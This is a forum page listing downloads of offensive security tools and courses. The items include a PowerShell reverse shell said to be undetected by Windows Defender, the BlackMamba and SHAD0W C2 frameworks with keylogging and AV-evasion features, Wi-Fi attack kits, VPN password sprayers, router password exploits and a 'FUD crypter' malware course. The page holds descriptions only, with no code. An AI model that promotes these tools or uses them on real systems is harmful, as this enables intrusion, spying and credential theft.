Search the Community

Description Kali contains an array of tools to assist with security assessments and penetration tests. This course will teach you how to use some of those tools to exploit the systems you find, moving you into a position to perform post exploitation tasks. A large number of security tools are available to help with a penetration test and understanding how to use them is critical to make testing effective. In this course, Exploitation with Kali Linux, you’ll learn to exploit the vulnerabilities you find. First, you’ll learn how to access systems using CrackMapExec. Next, you’ll discover how to create and use payloads to initially exploit a computer. Finally, you’ll learn how to use Metasploit alone to exploit remote systems and prepare for post exploitation. When you’re finished with this course, you’ll have the skills and knowledge to comfortably exploit computers within a network. [Hidden Content] [hide][Hidden Content]]

An automatic Blind ROP exploitation python tool Abstract BROP (Blind ROP) was a technique found by Andrew Bittau from Stanford in 2014. Original paper Slides Most servers like nginx, Apache, MySQL, and forks then communicate with the client. This means canary and addresses stay the same even if there is ASLR and PIE. So we can use some educated brute force to leak information and subsequently craft a working exploit. Flow of exploitation Find buffer overflow offset Find canary Find saved registers (RBP / RIP) Find stop gadgets Find brop gadgets Find a Write function (write / dprintf / puts / …) Leak the binary [hide][Hidden Content]]

Description Learning about PowerShell exploitation techniques and tools is of vital importance for successfully running red team operations or penetration tests in Windows environments. The ability to make use of readily available tools such as PowerShell when targeting Windows operating systems during red teaming exercises is crucial to guarantee a successful outcome. In this course, Exploitation with PowerShell, you’ll learn to leverage PowerShell to your advantage when targeting Windows operating systems. First, you’ll explore various types of tools that you can work with to build evasive payloads. Next, you’ll discover how to embed these payloads into client-side exploits. Finally, you’ll learn about the various security mitigations which you may be confronted with during security operations and how to evade them. When you’re finished with this course, you’ll have the skills and knowledge required to successfully conduct pentests and red team exercises using PowerShell. [Hidden Content] [hide][Hidden Content]]

This is a powershell reverse shell that executes the commands and or scripts that you add to the powerreverse.ps1 file as well as a small library of Post-Exploitation scripts. This also can be used for post-exploitation and lateral movement even. Please use it at your own risk I am not and will not be responsible for your actions. Also, this reverse shell currently is not detected by Windows Defender. If you want to use this make sure to set up a Digital Ocean VPS and have the script connect back there or your C2. Happy Hacking! Key Features Reverse Shell Simply Change The IP & Port & Let It Do Its Magic Blue Screen Of Death (BSOD) Basically will call winit.exe and give a blue screen and shutdown the computer Disable Windows Defender (Needs Admin Priv Of Course) Get Computer Information Disable Input (Needs Admin Priv) Disable Monitor Exclude File Extensions (Needs Admin Priv) Exclude Folder (Needs Admin Priv) Exclude Process (Needs Admin Priv) Get USB History GPS Location (Gets The Lat & Long Then Performs A Reverse GEO Lookup & Spits Out The Exact Address) Grab Wifi Credentials Ifconfig List Antivirus Running List External IP Logoff Mayhem Window Popup Send A Message Box Network Scan (Internal Scan The Network For Open Ports & IPs) Restart Rickroll Scare Window Screenshot The Screen System Time Webcam List [hide][Hidden Content]]

Purpose toxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js). This project started as (and still is) a research-based creative endeavor to explore the exploitability depth that an XSS vulnerability may introduce by using vanilla JavaScript, trusted certificates and cheap tricks. Disclaimer: The project is quite fresh and has not been widely tested. [hide][Hidden Content]]

A fully offensive framework to the 802.11 networks and protocols with different types of attacks for WPA and WEP, automated hash cracking, Bluetooth hacking, and much more. I recommend you my alfa adapter: Alfa AWUS036ACM, which works really great with both, 2.4 and 5 Ghz Tested and supported in Kali Linux, Parrot OS, Arch Linux, and Ubuntu SUPPORTED ATTACKS: Deauthentication Attack Authentication Attack Beacon Flood Attack PKMID Attack EvilTwin Attack Passive/Stealthy Attack Pixie Dust Attack Null Pin Attack Chopchop Attack Replay Attack Michael Exploitation Attack Caffe-Latte Attack Jamming, Reading and Writing Bluetooth connections GPS Spoofing with HackRF FEATURES: ☑️ Log generator ☑️ WPA/WPA2, WPS, and WEP Attacks ☑️ Auto handshake cracking ☑️ Multiple templates for EvilTwin attack ☑️ Check monitor mode and its status ☑️ 2Ghz and 5Ghz attacks ☑️ Custom wordlist selector ☑️ Auto detect requirements ☑️ Bluetooth support (Jamming, Reading, Writing) [hide][Hidden Content]]

A fully offensive framework to the 802.11 networks and protocols with different types of attacks for WPA and WEP, automated hash cracking, Bluetooth hacking, and much more. I recommend you my alfa adapter: Alfa AWUS036ACM, which works really great with both, 2.4 and 5 Ghz Tested and supported in Kali Linux, Parrot OS, Arch Linux, and Ubuntu SUPPORTED ATTACKS: Deauthentication Attack Authentication Attack Beacon Flood Attack PKMID Attack EvilTwin Attack Passive/Stealthy Attack Pixie Dust Attack Null Pin Attack Chopchop Attack Replay Attack Michael Exploitation Attack Caffe-Latte Attack Jamming, Reading and Writing Bluetooth connections GPS Spoofing with HackRF FEATURES: ☑️ Log generator ☑️ WPA/WPA2, WPS, and WEP Attacks ☑️ Auto handshake cracking ☑️ Multiple templates for EvilTwin attack ☑️ Check monitor mode and its status ☑️ 2Ghz and 5Ghz attacks ☑️ Custom wordlist selector ☑️ Auto detect requirements ☑️ Bluetooth support (Jamming, Reading, Writing) [hide][Hidden Content]]

VPN Overall Reconnaissance, Testing, Enumeration and Exploitation Toolkit Overview A very simple Python framework, inspired by SprayingToolkit, that tries to automate most of the process required to detect, enumerate and attack common O365 and VPN endpoints (like Cisco, Citrix, Fortinet, Pulse, etc...). Why I developed it Make the VPN spraying phase much quicker and easier. Also, due to its flexibility, this tool can be added to an existing OSINT workflow pretty easily. What the tool can do for you Vortex mainly provide assistance with performing the following tasks: User Search and Collection LinkedIn Google PwnDB Password Leaks PwnDB Main Domain Identification OWA S4B/Lynk ADFS Subdomain Search Enumeration Bruteforce VPN Endpoint Detection Password Spraying/Guessing attacks O365 Lynk/S4B ADFS IMAP VPNs Cisco Citrix FortiNet Pulse Secure SonicWall Search profiles on Social Networks Instagram Facebook Twitter TikTok Onlyfans [hide][Hidden Content]]

A Post exploitation tool written in C# uses either CIM or WMI to query remote systems. Introduction SharpStrike is a C# rewrite and expansion on @Matt_Grandy_'s CIMplant and @christruncer's WMImplant. SharpStrike allows you to gather data about a remote system, execute commands, exfil data, and more. The tool allows connections using Windows Management Instrumentation, WMI, or Common Interface Model, CIM ; well more accurately Windows Management Infrastructure, MI. CIMplant requires local administrator permissions on the target system. [hide][Hidden Content]]

View File Advance Exploitation Course By Umar Sabil Advance Exploitation Course By Umar Sabil * Make Your Serve FUD - 12 Topics * Convert your Server to mp3,mp4,image * Convert your Server to TXT * Macro Word Exploit * Email spoofing Advance Techniques * Make Your Server Anti Kill * Make Your Own Crypter FUD Download Link : Free for users PRIV8 Submitter dEEpEst Submitted 05/09/21 Category Libro Online Password ********  

RomBuster is a router exploitation tool that allows to disclosure network router admin password. Features Exploits vulnerabilities in most popular routers such as D-Link, Zyxel, TP-Link and Huawei. Optimized to exploit multiple routers at one time from list. Simple CLI and API usage. [hide][Hidden Content]]

Offensive Software Exploitation (OSE) Course This repository is for the Offensive Software Exploitation Course I am teaching at Champlain College and currently doing it for free online (check the YouTube channel for the recordings). Most of the slide notes I used are already shared on HTID Course, but the labs were fully created by myself. I used publically available resources and software to explain each of the weaknesses covered, so there is nothing here that you cannot find online. Vulnerable Software The vulnerable software I used is also online and can be found at Exploit-db. I also used Stephen Bradshaw’s VulnServer, plus maybe some other simple code that I prepared. Please check each lab for the software used in that specific lab and from where to download it. Tool(s) Required All of the tools used are free and could be downloaded from the URLs below. Immunity Debugger: download Kali Linux: download CFF Explorer: download PE-bear: download Ghidra: download IDA Pro: download x64dbg: download Microsoft SysInternals Suite: download CAPA by FireEye FLARE Team: download NetCat: download Others! Target(s) Used Download a Windows 10 VM from Microsoft VMs (currently using Version 1809 Build 17763.1339) here. This will be used for most of the labs, except for the EggHunter lab, I used a Windows 7 VM, also from Microsoft VMs (currently offline so check archive.org). All the targeted software is Intel/AMD 32-bit unless otherwise instructed. Table of Contents: The topics that will be covered in this course are: The Basics (PE Format, DLLs, etc) Bug Hunting and Fuzzing Intro. to Memory Corruption and Buffer Overflows Metasploit Mitigation Techniques SEH and Jumping Strategies Egghunter Return Oriented Programming (ROP) Post Exploitation Manual Code Injection Intro. to Assembly x86 and x64 (please check-update #3 for this part) Reverse Engineering (please check-update #3 for this part) Video Recordings: Arabic version: Playlist English version: Playlist Useful Resources: The number one resource is the Corelan Team’s blog, Corelan Team Introductory Intel x86, OpenSecurityTraining [hide][Hidden Content]]

BlackMamba BlackMamba is a multi-client C2/post-exploitation framework with some spyware features. Powered by Python 3.8.6 and QT Framework. Some of BlackMamba features are: Multi-Client – Supports multiple client connections at the same time. Real-Time Communication Updates – Real-time communication and updates between the client and server. Encrypted Communication – Almost all communications are encrypted, with exception of screen video streaming. Screenshot Gathering – Get a real-time screenshot from the client. Video Streaming – Watch in real-time the client screen. Client Lock – Lock and unlock the machine of the client. Encrypted File Transfer (upload/download) – Download files from the client or uploads files for the client. Keylogger – Register all the keys pressed by the client. Web Downloader – Download files from URLs or content by RAW pages. Changelog v1.0.41 New feature: Enumeration of open ports. [hide][Hidden Content]]

BlackMamba BlackMamba is a multi-client C2/post-exploitation framework with some spyware features. Powered by Python 3.8.6 and QT Framework. Some of BlackMamba features are: Multi-Client – Supports multiple client connections at the same time. Real-Time Communication Updates – Real-time communication and updates between the client and server. Encrypted Communication – Almost all communications are encrypted, with exception of screen video streaming. Screenshot Gathering – Get a real-time screenshot from the client. Video Streaming – Watch in real-time the client screen. Client Lock – Lock and unlock the machine of the client. Encrypted File Transfer (upload/download) – Download files from the client or uploads files for the client. Keylogger – Register all the keys pressed by the client. Web Downloader – Download files from URLs or content by RAW pages. Changelog v1.0.24 New feature: Enumeration of antiviruses of the client host [hide][Hidden Content]]

BlackMamba BlackMamba is a multi-client C2/post exploitation framework with some spyware features. Powered by Python 3.8.6 and QT Framework. Some of BlackMamba features are: Multi-Client – Supports multiple client connections at the same time. Real-Time Communication Updates – Real-time communication and updates between the client and server. Encrypted Communication – Almost all communications are encrypted, with exception of screen video streaming. Screenshot Gathering – Get a real-time screenshot from the client. Video Streaming – Watch in real-time the client screen. Client Lock – Lock and unlock the machine of the client. Encrypted File Transfer (upload/download) – Download files from the client or uploads files for the client. Keylogger – Register all the keys pressed by the client. Web Downloader – Download files from URLs or content by RAW pages. [hide][Hidden Content]]

A high performance FortiGate SSL-VPN vulnerability scanning and exploitation tool. Requirements Tested with Parrot & Debian Operating Systems and Windows 10 [hide][Hidden Content]]

SHAD0W is a modular C2 framework designed to successfully operate in mature environments. It will use a range of methods to evade EDR and AV while allowing the operator to continue using tooling tradecraft they are familiar with. It’s powered by Python 3.8 and C, using Donut for payload generation. By using Donut alongside the process injection capabilities of SHAD0W it gives the operator the ability to execute .NET assemblies, EXEs, DLLs, VBS, JS, or XSLs fully inside the memory. Dynamically resolved syscalls are heavily used to avoid userland API hooking, anti-DLL injection to make it harder for EDR to load code into the beacons, and official Microsoft mitigation methods to protect spawn processes. The main features of the SHAD0W C2 are: Built For Docker – It runs fully inside docker allowing cross-platform usage Live Proxy & Mirror – The C2 server is able to mirror any website in real-time, relaying all non C2 traffic to that site making it look less subject when viewed in a web browser HTTPS C2 Communication – All traffic between beacons and the C2 will be encrypted and transmitted over HTTPS Modern CLI – The CLI is built on prompt-toolkit JSON Based Protocol – Custom beacons are able to built and used easily with an easy to implement the protocol Extremely Modular – Easy to create new modules to interact and task beacons The main features of SHAD0W beacons are: Shellcode, EXE, Powershell & More – Beacons can be generated and used in many different formats Process Injection – Allowing you to migrate, shinject, dllinject and more Bypass AV – Payloads are frequently updated to evade common Anti-Virus products Highly configurable – Custom jitters, user agents and more Proxy Aware – All callbacks will use the current system proxy HTTPS C2 Communication – Traffic to and from the C2 is encrypted via HTTPS Current Modules: GhostPack – With the binary compiled nightly via an Azure pipeline. Thanks to @Flangvik Unmanaged Powershell – With built-in AMSI bypass Ghost In The Logs – Disable ETW & Sysmon, more info can be found here Elevate – Built-in PrivEsc exploits SharpSocks – Reverse socks proxy over HTTPS SharpCollection – A ton of .NET offensive tools, more info can be found here Mimikatz – For all your credential theft needs Upload & Download – Easy data exfiltration StdAPI – Common commands to interact with the file system [hide][Hidden Content]]

Pown Pown.js is a security testing and exploitation toolkit built on top of Node.js and NPM. Unlike traditional security tools like Metasploit, Pown.js considers frameworks to be an anti-pattern. Therefore, each module in Pown is, in fact, a standalone NPM module allowing a greater degree of reuse and flexibility. Creating new modules is a matter of publishing to NPM and tagging them with the correct tags. The rest is handled automatically. [Hidden Content]

Break out the Box (BOtB) BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies. What does it do? BOtB is a CLI tool which allows you to: Exploit common container vulnerabilities Perform common container post-exploitation actions Provide capability when certain tools or binaries are not available in the Container Use BOtB’s capabilities with CI/CD technologies to test container deployments Perform the above in either a manual or an automated approach Current Capabilities Find and Identify UNIX Domain Sockets Identify UNIX domain sockets which support HTTP Find and identify the Docker Daemon on UNIX domain sockets or on an interface Analyze and identify sensitive strings in ENV and process in the ProcFS i.e /Proc/{pid}/Environ Identify metadata services endpoints i.e [Hidden Content], [Hidden Content] and [Hidden Content] Perform a container breakout via exposed Docker daemons Perform a container breakout via CVE-2019-5736 Hijack host binaries with a custom payload Perform actions in CI/CD mode and only return exit codes > 0 Scrape metadata info from GCP metadata endpoints Push data to an S3 bucket Break out of Privileged Containers Force BOtB to always return a Exit Code of 0 (useful for non-blocking CI/CD) Perform the above from the CLI arguments or from a YAML config file Perform reverse DNS lookup Identify Kubernetes Service Accounts secrets and attempt to use them Changelog v1.8 In this release, the following is addressed: Added @initree‘s Keyctl pwnage to extract entries from the Linux Kernel Keyring ([Hidden Content]) Modified the new Keyctl code to be multi-threaded to make use of Go workers to speed up enumeration [hide][Hidden Content]]

Introduction Bashark aids pentesters and security researchers during the post-exploitation phase of security audits. [hide][Hidden Content]]

Vailyn is a multi-phased vulnerability analysis and exploitation tool for path traversal/directory climbing vulnerabilities. It is built to make it as performant as possible and to offer a wide arsenal of filter evasion techniques. How does it work? Vailyn operates in 2 phases. First, it checks if the vulnerability is present. It does so by trying to access /etc/passwd, with all of its evasive payloads. Analyzing the response, payloads that worked are separated from the others. Why phase separation? The separation in several phases is new in this version. It is done to hugely improve the performance of the tool. In previous versions, every file-directory combination was checked with every payload. This resulted in a huge overhead due to payloads being always used again, despite they are not working for the current server. Changelog v1.5.1-3 [New Features] Tor support now for Windows, too. Tor service must be started manually beforehand. [Bug Fixes] fixed an issue on Windows, where the tool would crash for targets with custom port or BasicAuth, because : is not an allowed directory character fixed terminal output flood during attack by providing an extra progress function color output should work now on Windows, please report back if it still doesn’t [hide][Hidden Content]]

Introduction CMSeeK is a CMS detection and exploitation tool, written in Python3, capable of scanning numerous content management systems including WordPress, Joomla, Drupal, etc. It allows you to run both simple CMS detection and deep scans, as well as multisite scans. Currently it can be ran on any Unix-based system (Linux, OS X), but soon it’ll be available for Windows, too. Features: CMSeeK can perform basic CMS detection: for plenty of different CMS (150+). Capable of advanced WordPress scans: plugins, user and theme enumeration; version and user detection (3 different detection modes); version vulnerabilities detection, etc. Beside WordPress version detection, it can detect Drupal version. Capable of Advanced Joomla scans: admin page and backup files finder; core vulnerability and config leak detection; directory listing checks, etc. It has modular brute-force system: you can use pre made or create your own modules and integrate it within CMSeeK system. And so much more. Version 1.1.3 updates: Release Date: 25th July 2020 Added new CMS: Smartstore Solusquare Commerce Cloud Spree Brightspot CMS Amiro.CMS Weebly ekmPowershop GoDaddy Website Builder WHMCS Zen Cart OpenNemas CMS IPO CMS Version detection added for: Amiro.CMS GoDaddy Website Builder Added WordPress Bruteforce via XML-RPC improved logging for joomla scans improved logging for WordPress deep scan Switched to wpvulns.com for wordpress vulnerabilities Added --light-scan argument Added (--only-cms, -o) argument [hide][Hidden Content]]

Commix (short for [comm]and njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos (@ancst) that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header. Changelog Version 3.1 Fixed: Multiple bug-fixes regarding several reported unhandled exceptions. Added: A script “setup.py” has been added (i.e. easier installation). Revised: Improvement regarding checking if the provided value has boundaries (e.g. ‘param=/value/’). Revised: Improvement regarding dynamic code evaluation technique’s heurstic checks. Revised: Improvement regarding identifying the indicated web-page charset. Revised: Minor improvement regarding verbose mode (i.e. debug messages). Fixed: Bug-fix regarding Basic HTTP authentication. Revised: Minor improvement regarding redirection mechanism. Fixed: Bug-fix regarding defining wildcard character “*” in nested JSON objects. Revised: Minor improvement regarding Flatten_json (third party) module. Revised: Minor improvement regarding parsing nested JSON objects. Added: New tamper script “doublequotes.py” that adds double-quotes (“”) between the characters of the generated payloads (for *nix targets). Fixed: Bug-fix regarding parsing raw HTTP headers from a file (i.e. -r option). Revised: Improvements regarding data in the detailed message about occurred unhandled exception. Revised: Minor bug-fixes and improvements regarding HTTP authentication dictionary-based cracker. [hide][Hidden Content]]

Introduction Bashark aids pentesters and security researchers during the post-exploitation phase of security audits. Features Single Bash script Lightweight and fast Multi-platform: Unix, OSX, Solaris etc. No external dependencies Immune to heuristic and behavioural analysis Built-in aliases of often used shell commands Extends system shell with post-exploitation oriented functionalities Stealthy, with custom cleanup routine activated on exit Easily extensible (add new commands by creating Bash functions) Full tab completion [HIDE][Hidden Content]]